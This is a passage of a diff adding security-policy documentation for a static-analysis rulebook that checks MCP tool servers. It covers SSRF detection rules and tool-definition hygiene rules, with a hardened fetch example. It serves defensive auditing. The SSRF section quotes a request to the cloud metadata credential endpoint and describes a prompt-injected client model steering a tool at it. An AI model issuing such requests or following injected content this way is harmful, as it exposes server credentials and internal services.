server sits on the network. + +--- + +## What this policy covers + +MCP tool handlers — functions registered via `@server.tool` / `@mcp.tool` / +`.register_tool` (Python, MCP-008) or the TypeScript MCP SDK tool registration +(MCP-013) — whose body issues an HTTP request to a destination URL that is not a +fixed string literal. Detection is the structured `has_dynamic_url_call` +predicate, not a substring scan. On the **Python** side it walks the handler's +AST, resolves same-function client aliases (`s = requests.Session(); s.get(...)`), +recognizes a fixed set of HTTP callees — the `requests` family +(`requests.get/post/put/delete/patch/head/request`, `requests.Session.get/post`), +the `httpx` family (`httpx.get/post/put/delete/patch/head/request` plus +`httpx.Client` / `httpx.AsyncClient`), `urllib.request.urlopen`, and +`aiohttp.ClientSession.get/post` — and fires when the first positional argument is +anything other than a plain string literal: a bare parameter (`requests.get(url)`), +an f-string with an `interpolation` child (`httpx.get(f"https://{host}/x")`), or a +built-up expression. On the **TypeScript** side the signal is the discovery-computed +`dynamic_url` fact: it recognizes the callees `fetch`, `axios` +(`axios.get/post/put/delete/patch/request`), `got` (`got.get/post`), and +`undici.fetch` / `undici.request`, inspects the **first positional argument**, and +fires when it is an identifier, a member expression, a concatenation, a call, or a +template string carrying a `${...}` substitution. A request to a hard-coded literal +URL — or a backtick template with no substitution — does not fire on either side. + +--- + +## Why SSRF is a distinct concern in agent tools + +The general mechanism — the model picks the destination host, and the agent host +sits inside a cloud network with reach the public internet lacks — is the same one +spelled out in +[claude_sdk/ssrf.md](../claude_sdk/ssrf.md#why-ssrf-is-a-distinct-concern-in-agent-tools). +Read that for the metadata-credential-theft path +(`169.254.169.254` → short-lived role credentials → exfiltration into the model +context and onward into logs or the next turn). + +The MCP sharpening is the **trust boundary**, and it is the worst case of the four +SDKs the rulebook covers. An MCP tool's URL argument is not merely "model-chosen" +in the abstract: the arguments arrive over the wire from a *connecting client* the +server does not control, populated by a model that may have been prompt-injected by +untrusted content upstream — a web page it read, a document it summarized, an email +in the thread. There is **no human in the loop** at the moment the tool fires and no +"trusted developer input" channel; the MCP server forwards the client's chosen +arguments verbatim into the HTTP client. A `fetch(target)` handler is, by +construction, a callable the *remote orchestrator* can aim anywhere the server host +can reach. + +Where the server sits makes that reach dangerous. MCP servers are routinely +deployed inside a cloud VPC or a CI runner — exactly the environments that expose +the instance metadata service at `169.254.169.254` (vending credentials for the +attached role/service account to any local HTTP caller), loopback admin APIs +(`http://localhost:` dashboards, debug consoles, unauthenticated internal +control planes), and internal-only microservices. A single injected +`fetch("http://169.254.169.254/latest/meta-data/iam/security-credentials/")` +turns prompt injection on the *client* side into credential theft on the *server* +side. Worse than the in-process SDK case, an MCP server is frequently **shared +across multiple clients**: one client's poisoned conversation drives a fetch from a +host that other tenants also rely on, so the SSRF primitive is reachable by the +least-trusted connecting party. The request body — auth headers, payloads — also +leaks to whatever host the URL resolves to. + +This maps to OWASP LLM Top 10:2025 **LLM06 (Excessive Agency)** — the tool grants +the connecting model a network reach far broader than its task requires — and +**LLM02 (Sensitive Information Disclosure)**, because the common payoff is +credential or internal-data exfiltration. Allow-listing the *path* while leaving the +*host* caller-controlled is the trap: the host is the security boundary, not the +path. + +--- + +## Rule-by-rule defense + +### MCP-008 — Tool fetches a caller-controlled URL (SSRF) (Severity: high, Confidence: 0.6, Fix type: code) + +**What we detect:** +A Python MCP tool handler (`@server.tool` / `@mcp.tool` / `.register_tool`) whose +body makes an HTTP call where the URL argument is not a string literal — a +parameter, an interpolated f-string, or a built-up expression. The predicate +(`has_dynamic_url_call`) is an AST walk: it resolves same-function client aliases, +recognizes the `requests.*` / `httpx.*` / `urllib.request.urlopen` / +`aiohttp.ClientSession.get|post` callees, and inspects the first positional +argument, firing when it is anything other than a plain `string` node (an f-string +with an `interpolation` child also fires). Comments and docstrings do not fire. + +**Why it is flaggable:** +A non-literal URL in an MCP tool means the destination host is, in practice, chosen +by the connecting client's model. Because MCP arguments cross a trust boundary with +no human gate, the presence of the dynamic URL is the signal that the handler can be +steered at hosts the author never intended — the server is now a confused-deputy +proxy for requests the remote party could not otherwise make. + +**Real-world consequence:** +- A `fetch_url(url: str)` tool on an MCP server running in a cloud VPC is, via a + prompt-injected client conversation, asked to fetch + `http://169.254.169.254/latest/meta-data/iam/security-credentials/`; the + returned credentials flow back through the tool result into the model context and + from there into logs or the attacker's next turn. +- A `proxy(target: str)` tool exposed to a desktop MCP client is pointed at + `http://localhost:` admin services on the host, reaching an internal control + plane that assumed it was unreachable from any untrusted party. + +**Why severity is high and not medium:** +The exploit needs no second vulnerability — a single tool call against a reachable +metadata or internal endpoint yields credentials or internal data, and on MCP there +is no human approval step to interrupt it. It is not critical only because impact is +conditional on the server host's network position, and a correct host allow-list +with post-resolution IP checks fully neutralizes it. + +**Fix type — code:** +Constraining the destination — an explicit host allow-list, a fixed base URL with +only a path parameter, or post-resolution rejection of private/loopback/link-local +ranges with redirects disabled — is an edit to the tool's own handler source. A +network-layer egress firewall on the MCP server host is complementary defense in +depth but is not what the rule asks the author to change. + +**Confidence 0.6:** +The gap (0.6, well below 0.80) is two-sided. **False positive:** many MCP tools +legitimately fetch a parameter-supplied URL and *do* validate it — but the +validation frequently lives in a helper or an `@`-decorator in another module that +the body-only AST walk cannot see, so a correctly-guarded tool still fires; the +predicate also cannot tell a genuinely public "fetch this page" reader from an +internal proxy. **False negative:** a URL assembled in a helper before the call, or +built via `urljoin`/`urlparse` from a caller-controlled base, or passed to an HTTP +client outside the recognized callee set, evades the first-argument check. A strong +lead to investigate, not a near-certain defect. + +### MCP-013 — TypeScript MCP tool fetches a caller-controlled URL (SSRF) (Severity: high, Confidence: 0.6, Fix type: code) + +**What we detect:** +A TypeScript MCP tool handler whose body issues an HTTP call to a URL that is not a +plain string literal (predicate `has_dynamic_url_call`, backed by the structural +`dynamic_url` fact computed during discovery). The fact recognizes a fixed set of +HTTP callees — `fetch`, `axios` and its method forms +(`axios.get/post/put/delete/patch/request`), `got` / `got.get` / `got.post`, and +`undici.fetch` / `undici.request` — and inspects the **first positional argument**. +It fires when that argument is an identifier (`fetch(url)`), a member expression +(`fetch(opts.url)`), a string concatenation, a call expression, or a template string +containing a `${...}` substitution. A plain `"https://..."` literal, or a backtick +template with no substitution, does not fire. + +**Why it is flaggable:** +A non-literal URL argument means the destination host is chosen by the connecting +client's model. The threat model is identical to the Python sibling +[MCP-008](#mcp-008--tool-fetches-a-caller-controlled-url-ssrf-severity-high-confidence-06-fix-type-code): +the MCP server typically runs inside a VPC or CI runner with reach to the instance +metadata service (`169.254.169.254`), loopback admin endpoints, and internal +microservices the public internet cannot address, and the caller is a remote +orchestrator with no human gate. The only delta is the client library +(`fetch`/`axios`/`got`/`undici` vs Python `requests`/`httpx`/`urllib`/`aiohttp`). + +**Real-world consequence:** +- A `readPage(url: string)` MCP web-reader tool, when its connecting client is + prompt-injected, is asked to fetch + `http://169.254.169.254/latest/meta-data/iam/security-credentials/` via + `fetch(url)`; the returned credentials land in the model context and from there + into logs or the attacker's next turn. +- An `httpProxy(target: string)` tool on a shared MCP server is steered at a + tenant-internal admin API at `http://localhost:`, reaching a control plane + other connected clients depend on. + +**Why severity is high and not medium:** +The exploit needs no second vulnerability — one tool call against a reachable +metadata or internal endpoint yields credentials or internal data, with no human +approval step. It is not critical only because impact is conditional on the server +host's network position, and a correct host allow-list fully neutralizes it. +Matches the Python sibling MCP-008. + +**Fix type — code:** +Constraining the destination (host allow-list, post-resolution IP checks, fixed base +URL, or resolving an opaque ID against a server-side registry and building the URL +from the trusted entry) is an edit to the tool handler's own source. A VPC egress +policy blocking the metadata CIDR is complementary defense in depth. + +**Confidence 0.6:** +Matches the Python sibling's 0.6. **False positives:** a tool that fetches a +parameter-supplied URL but validates it in a helper in another module still fires, +since the fact sees only the handler body's first argument; the fact also cannot +distinguish a genuinely public "fetch this page" tool from an internal proxy. +**False negatives that are TS-specific:** an HTTP client not in the recognized +callee set (`node:http`/`node:https` `request`/`get`, `node-fetch` under a renamed +import, `superagent`, `ky`, `XMLHttpRequest`, or any wrapped client), a URL placed +in an options object rather than the first positional argument (`axios({ url })`, +`fetch(req)` where `req` is a `Request`), a `new URL(base, modelValue)` constructed +before the call, or a URL assembled in a helper — all evade the first-argument check +on a known callee. + +--- + +## What this policy does not cover + +- URL validation implemented in another module, a decorator, or a shared helper — + the body walk sees only the tool handler, so a guarded tool may still fire (false + positive). +- (Python, MCP-008) HTTP clients outside the recognized set — `urllib3`, `pycurl`, + `http.client.HTTPConnection`, raw `socket` connections, or `requests`/`httpx` + calls reached through an instance attribute (`self.client.get(...)`) rather than a + same-function alias — do not fire. +- (TypeScript, MCP-013) HTTP clients outside the recognized + `fetch`/`axios`/`got`/`undici` set — `node:http`/`node:https` `request`/`get`, + `node-fetch` under a renamed import, `superagent`, `ky`, `XMLHttpRequest`, and + wrapped clients — do not fire. A model-controlled URL passed in an options object + (`axios({ url })`) or via a `Request` object rather than as the first positional + argument also evades the check. +- A literal base URL combined with a caller-controlled *path* that uses `..` + traversal or an `@`-userinfo trick to redirect the request to another host — the + first argument is a literal, so neither rule fires. +- DNS rebinding and redirect-based SSRF: a first request to an allow-listed host + that returns a 302 to an internal address. The rules check the *initial* URL, not + the post-redirect target. +- Indirect destination control: a model-supplied opaque ID or query parameter that + the handler maps to an internal host through trusted-looking server-side logic. +- Whether the *fetched content* is itself dangerous — prompt injection in the + response body that flows back into the model — which is an output-guardrail + concern, not this rule. +- The rules do not weight impact by the server's actual network position or the + attached role's grants; they treat every dynamic-URL MCP tool as high-impact. + Treat a finding as high until the server's egress reach and credential blast + radius are confirmed. + +--- + +## Recommendations beyond the fix + +```python +import ipaddress +import socket +from urllib.parse import urlparse + +import httpx +from mcp.server.fastmcp import FastMCP + +mcp = FastMCP("reports") + +_ALLOWED_HOSTS = {"api.example.com", "data.example.com"} + + +@mcp.tool() +def fetch_report(host: str, path: str) -> dict: + """Fetch a report from an approved host. `host` must be on the allow-list.""" + # 1. Host allow-list — the host is the security boundary, not the path. + if host not in _ALLOWED_HOSTS: + return {"error": "host not allowed", "retryable": False} + + # 2. Resolve and reject non-public ranges *before* connecting. + for info in socket.getaddrinfo(host, 443): + ip = ipaddress.ip_address(info[4][0]) + if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved: + return {"error": "host resolves to a non-public address", "retryable": False} + + # 3. Build the URL from the trusted host; never let `path` change the host. + url = f"https://{host}/{path.lstrip('/')}" + if urlparse(url).hostname != host: + return {"error": "constructed URL host mismatch", "retryable": False} + + # 4. Disable redirects so an allowed host cannot bounce to an internal one. + return {"body": httpx.get(url, timeout=10, follow_redirects=False).text} +``` + +1. Make the **host** an allow-list, not the path — the host is the security + boundary; a path-only allow-list is bypassable via `..` traversal, + `@`-userinfo, and redirect tricks. +2. Resolve the hostname and reject private, loopback, link-local, and reserved IP + ranges *before* connecting, and re-check after every redirect (mitigates DNS + rebinding, which a one-shot pre-check alone does not). +3. Disable automatic redirects so an allow-listed host cannot bounce the request to + an internal address. +4. Prefer an **opaque ID resolved against a server-side registry** over a free-form + URL parameter: accept `report_id`, look up the trusted URL, and never construct + the destination from the caller's string at all — this removes the dynamic-URL + signal entirely. +5. Because an MCP server's URL argument arrives from an untrusted remote client with + no human in the loop, treat it as fully hostile **regardless of deployment**, and + assume the server may be shared across clients — never widen the allow-list to + accommodate one client's needs. +6. At the MCP server host / VPC level, block `169.254.169.254` and internal CIDRs at + the network layer as defense in depth, independent of the tool's own checks. diff --git a/docs/Policy/mcp/tool_definition.md b/docs/Policy/mcp/tool_definition.md new file mode 100644 index 0000000..0a2c6d8 --- /dev/null +++ b/docs/Policy/mcp/tool_definition.md @@ -0,0 +1,333 @@ +--- +policy_id: mcp_tool_definition +category: mcp +topic: tool_definition +rules: + - id: MCP-001 + severity: low + confidence: 0.9 + scope: tool + fix_type: code + - id: MCP-002 + severity: medium + confidence: 0.85 + scope: tool + fix_type: code + - id: MCP-003 + severity: low + confidence: 0.85 + scope: tool + fix_type: code + - id: MCP-011 + severity: low + confidence: 0.85 + scope: tool + fix_type: code +references: [LLM06] +--- + +# Policy Rationale: MCP Tool Definition Hygiene + +**Policy ID:** `mcp_tool_definition` +**File:** `mcp/tool_definition.yaml` +**Rules:** MCP-001, MCP-002, MCP-003, MCP-011 +**Severities:** low, medium, low, low +**Fix types:** code, code, code, code +**References:** LLM06 + +--- + +## What this policy covers + +The three surfaces an MCP server advertises across its connection boundary for +every tool it exposes — the tool's **description**, its **input schema** (derived +from parameter type annotations), and its **name**. These rules fire on Model +Context Protocol tool registrations: `@server.tool` / `@mcp.tool` decorators and +`.register_tool(...)` calls in Python, and `server.registerTool(name, {description, +inputSchema}, handler)` in TypeScript. MCP-001 fires when a Python registration has +no docstring and no explicit description (predicate `has_docstring: false`); +MCP-002 when the handler has parameters but none is type-annotated (`has_params: +true` with `has_typed_params: false`); MCP-003 when the tool name is one of a +closed set of vague verbs — `process`, `handle`, `run`, `do`, `execute`, +`perform`, `work`, `go`, `thing`, `stuff` (`name_in`); MCP-011 when a TypeScript +registration's `description` is empty or built from a non-literal expression +(`has_docstring: false`). + +--- + +## Why tool definition hygiene is a distinct concern in agent tools + +In a conventional library a function's name and signature are a convenience for +the developer who calls it; in an MCP server they are the *entire* contract a +connecting model uses to route. An MCP server publishes each tool's name, +description, and JSON input schema across a process and trust boundary to whatever +client connects, and the model on the far side reads that metadata, picks a tool by +name and description, and synthesizes the arguments from the schema. There is +**no human in that loop** to disambiguate a vague name or correct a fabricated +argument before the call lands. + +This is strictly worse than the in-process SDK case (Claude, OpenAI, ADK) for two +structural reasons. First, the caller is **not code the server author controls** — +it is an external orchestrator, often a *different vendor's* agent, whose prompt, +routing heuristics, and even base model the author cannot see or tune. A +description that "the team knows what it means" is worthless to a model the team +never tested against. Second, an MCP server is frequently **mounted by many clients +at once and shared across multiple agents**, so a single weak definition degrades +tool selection for every consumer simultaneously, and an ambiguous name like +`process` collides far more easily with similarly-named tools from *other* servers +loaded into the same session — the model is choosing among the union of every +mounted server's tools, not just this one's. + +When the description is missing, the connecting model must guess the tool's purpose +from the name alone, and under an ambiguous request it mis-selects — calling the +wrong tool, or the right tool with wrong arguments. When parameters are untyped, +MCP advertises a degraded schema (parameters fall back to an unconstrained type), +so the model fabricates loosely-typed values that the handler then mishandles or +crashes on. When the name is a generic verb, the router has no signal to +distinguish it. Each gap degrades selection precisely when the input is unclear — +which is exactly when correct routing matters most. + +These are reliability and correctness failures rather than direct memory-safety +exploits, but in an agentic setting a mis-selected tool *is* an unintended action. +The cluster anchors to OWASP **LLM06 (Excessive Agency)**: weak tool boundaries let +a model — here, one the author does not even control — act in ways the author never +intended. + +--- + +## Rule-by-rule defense + +### MCP-001 — Tool has no description (Severity: low, Confidence: 0.9, Fix type: code) + +**What we detect:** +A Python MCP tool registration (`@server.tool` / `@mcp.tool` / `.register_tool`) +whose handler function has no docstring and no explicit `description=` argument +(predicate `has_docstring: false`). + +**Why it is flaggable:** +The MCP server publishes the docstring (or the explicit description) to connecting +clients as the text the model uses to decide whether to call the tool. With none, +every connecting model routes on the function name alone — and because the server +is shared, that gap degrades routing for all clients at once, not just one. + +**Real-world consequence:** +An MCP server exposes `def lookup(q: str)` with no docstring next to `def search(q: +str)`. A connecting agent — possibly a different vendor's model the server author +never tested — cannot tell which retrieves what and picks wrong under an ambiguous +query, returning the wrong data with full confidence to a user nobody in the loop +can correct. + +**Why severity is low and not medium:** +It degrades selection quality but rarely causes direct harm on its own, and a +well-named tool partially compensates. The impact is mis-routing, not +wrong-argument execution or a breach — so it stays low. + +**Fix type — code:** +The fix is to add a one-line docstring (or a `description=` argument) to the +registration — an edit to the tool's source. No guardrail or sandbox change +addresses it. + +**Confidence 0.9:** +A missing docstring is mechanically unambiguous. The one false positive is a +registration whose description is supplied through a `description=` argument that +discovery did not capture (uncommon); otherwise an absent docstring is exactly what +it looks like. + +### MCP-002 — Tool has no type-annotated parameters (Severity: medium, Confidence: 0.85, Fix type: code) + +**What we detect:** +An MCP tool handler that has at least one parameter where no parameter carries a +type annotation (`has_params: true` with `has_typed_params: false`). `self` / `cls` +are ignored. + +**Why it is flaggable:** +MCP derives the tool's advertised input JSON schema from the handler's Python type +annotations. With none, the published schema is degraded — parameters fall back to +an unconstrained type — so connecting models have no constraint on argument shape +and send unvalidated inputs that frequently cause runtime errors inside the server. + +**Real-world consequence:** +An MCP server exposes `def transfer(amount, to)` with no annotations. The advertised +schema constrains neither field, so a connecting model passes `amount="a lot"` or a +malformed account id; the handler then coerces it wrong or crashes mid-side-effect — +and because the failure happens *inside the shared server*, it can surface as a 500 +to every client, not just the one that sent the bad call. + +**Why severity is medium and not low:** +Untyped parameters cause *wrong-argument execution*, not merely mis-selection — the +tool actually runs with bad data and may fire a partial side effect before failing. +That is a strictly higher impact than the description and name rules, so it sits a +band above them. It is not high because the failure typically surfaces as a runtime +error rather than a silent breach. + +**Fix type — code:** +The fix is to add type hints to every parameter (or pass structured inputs via a +Pydantic model / TypedDict so the published schema constrains them) — an edit to +the handler signature. No external config substitutes for the missing annotations. + +**Confidence 0.85:** +The predicate is mechanically reliable, but a handler that derives its real schema +from a Pydantic model or an explicit schema argument supplied elsewhere can be safe +yet annotation-free in its signature — the principal false positive, and the reason +this holds at 0.85 rather than higher. A false negative is a parameter typed as +`Any`, which satisfies the predicate while giving the model almost no constraint. + +### MCP-003 — Ambiguous tool name (Severity: low, Confidence: 0.85, Fix type: code) + +**What we detect:** +An MCP tool whose registered name is one of a closed, curated set of vague verbs: +`process`, `handle`, `run`, `do`, `execute`, `perform`, `work`, `go`, `thing`, +`stuff` (predicate `name_in`). + +**Why it is flaggable:** +A generic name carries no routing signal about the tool's intent. Because an MCP +server is consumed by clients the author does not control, an ambiguous name +degrades selection *everywhere the server is mounted*, and collides far more easily +with similarly-named tools exposed by other servers loaded into the same session — +the model is routing across the union of every mounted server's tools. + +**Real-world consequence:** +An MCP server exposes a tool named `process`. A client also mounts a second MCP +server that exposes its own `process`. The connecting model now sees two tools +named `process` with no way to tell them apart from the name, and a request that +should hit one is a coin-flip for the router whenever the prompt does not name the +server explicitly — invoking the wrong server's side effect. + +**Why severity is low and not medium:** +A clear description can rescue a vague name, so the impact is bounded and the rule +is a clarity nudge rather than a defect that breaks execution. It does not cause +wrong-argument execution the way MCP-002 does, so it stays a band below it at low. + +**Fix type — code:** +The fix is to rename the tool to a verb-object form (`summarize_invoice`, +`fetch_weather`) — an edit to the registration. No external configuration renames a +tool. + +**Confidence 0.85:** +The name list is curated, so every match is deliberate and false positives are +rare. The residual gap below higher confidence is the cross-server collision +framing the rule leans on: in a session where this is the *only* server and the +name is locally unambiguous, the finding is technically still a clarity issue but a +weaker one — and a domain where `run` or `execute` is genuinely the most +descriptive verb (e.g. a job-runner tool) is a possible, if uncommon, false +positive the static name match cannot rule out. + +### MCP-011 — TypeScript MCP tool has no description (Severity: low, Confidence: 0.85, Fix type: code) + +**What we detect:** +A TypeScript MCP registration — +`server.registerTool(name, {description, inputSchema}, handler)` — whose +`description` is empty or is built from a non-literal expression (predicate +`has_docstring: false`). Discovery captures the description only when that value is +a plain string literal; an omitted/empty `description` **and** one assembled from a +template string with `${...}`, an identifier, a member access, or a concatenation +are all recorded as empty and fire. Unlike the Python sibling MCP-001, which reads +the description from the handler docstring, the TypeScript SDK takes it as an +explicit key in the registration config object. + +**Why it is flaggable:** +The MCP server passes this `description` to every connecting model as the primary +signal for deciding whether to call the tool. With it empty, the model routes on +the tool name alone — the exact mis-selection mechanism documented for the Python +sibling +[MCP-001](#mcp-001--tool-has-no-description-severity-low-confidence-09-fix-type-code), +and degraded for every client of the shared server simultaneously. + +**Real-world consequence:** +A TypeScript server registers `registerTool("lookup", { description: "", inputSchema +}, handler)` next to a described `search` tool. Under an ambiguous query a +connecting agent cannot tell which retrieves what and picks wrong, returning the +wrong data with full confidence — and because the description is empty for every +client, no single consumer can be configured around it. + +**Why severity is low and not medium:** +Like MCP-001 it degrades selection quality but rarely causes direct harm on its +own, and a well-chosen tool name partially compensates. It matches the Python +sibling's low severity for the same reason: mis-routing, not wrong-argument +execution. + +**Fix type — code:** +The fix is to provide a concise `description` string literal in the registration +config — an edit to the `registerTool(...)` call site. No external config supplies +it. + +**Confidence 0.85:** +Marginally below the Python sibling's 0.9. The detection is mechanically exact (a +literal description is captured, anything else reads as empty), so the firing +itself is unambiguous; the gap reflects that a description built at runtime from a +non-literal expression — a constant assembled from `const` fragments — is genuinely +present to the model yet captured as empty here, a false positive the literal-only +capture cannot rule out. + +--- + +## What this policy does not cover + +- Descriptions or names that are *present but misleading* — a docstring or + `description` that describes the wrong behavior passes MCP-001 / MCP-011 yet + mis-routes worse than an empty one, and no single-tool predicate can read intent. +- Parameter types that are present but *too loose* (`x: Any`, `data: dict`) — they + satisfy MCP-002 while giving the connecting model almost no schema to constrain + arguments. +- Overlapping tool *purposes* — two distinct, well-named, well-described tools that + nonetheless do near-identical things will still confuse a router; that is a + server-design issue no per-tool check sees. +- Cross-server name collisions where *both* colliding names are descriptive but + identical (two servers each exposing a sensible `fetch_user`) — MCP-003 only fires + on the curated vague-verb set, so a collision between two non-vague names escapes. +- Descriptions supplied to a Python registration via an explicit `description=` + argument rather than the docstring may be captured as absent and fire MCP-001 as a + false positive. +- For MCP-011: a TypeScript `description` assembled from a non-literal expression (a + `const` reference, a template string, a concatenation) is real text the model + reads, but the literal-only capture records it as empty and fires anyway. +- The trust-boundary risks specific to MCP that these hygiene rules do **not** + touch: an unauthenticated or over-permissioned server, a tool that returns + attacker-controlled text the calling model then treats as instructions + (tool-output prompt injection), or a malicious server impersonating a trusted + tool name. Those are server-authorization and injection concerns, not definition + hygiene. + +--- + +## Recommendations beyond the fix + +```python +from mcp.server.fastmcp import FastMCP + +mcp = FastMCP("invoices") + + +@mcp.tool() +def fetch_invoice(invoice_id: str, include_lines: bool = False) -> dict: + """Fetch a single invoice by its ID. + + Use this when the caller asks about one specific invoice and provides its + ID. Returns the invoice header; set include_lines=True to also return line + items. Does NOT search — use search_invoices for lookups by date or amount. + """ + ... +``` + +The handler above gives every connecting client — including ones the author never +tested against — a name that states intent, a description written for the router +(when to use the tool *and when not to*), and a type-annotated signature that MCP +turns into a constraining input schema. Hardening beyond what the rules detect: + +1. Write the description for the *external router*, not for your own team: name when + to call the tool and, crucially, when **not** to (point at the sibling tool that + handles the other case). The model reading it may be a different vendor's agent + with no shared context. +2. Type every parameter and prefer narrow types (`Literal[...]`, an enum, a + constrained `int`, or a Pydantic model) over `str` / `Any`, so the advertised + JSON schema makes the model's argument space small and validates inputs *before* + the handler runs. +3. Namespace tool names to your server's domain (`invoices_fetch`, + `invoices_search`) so they do not collide with the same generic verb exposed by + another MCP server mounted into the same session. +4. Validate and bound arguments inside the handler regardless of the schema — + never trust that a connecting client respected the advertised types, because the + inputs are fully model-controlled and arrive across a trust boundary. +5. Treat tool *output* as untrusted: do not embed raw, attacker-influenceable + strings the calling model will read as instructions, and keep authorization on + the server side rather than assuming a well-behaved client.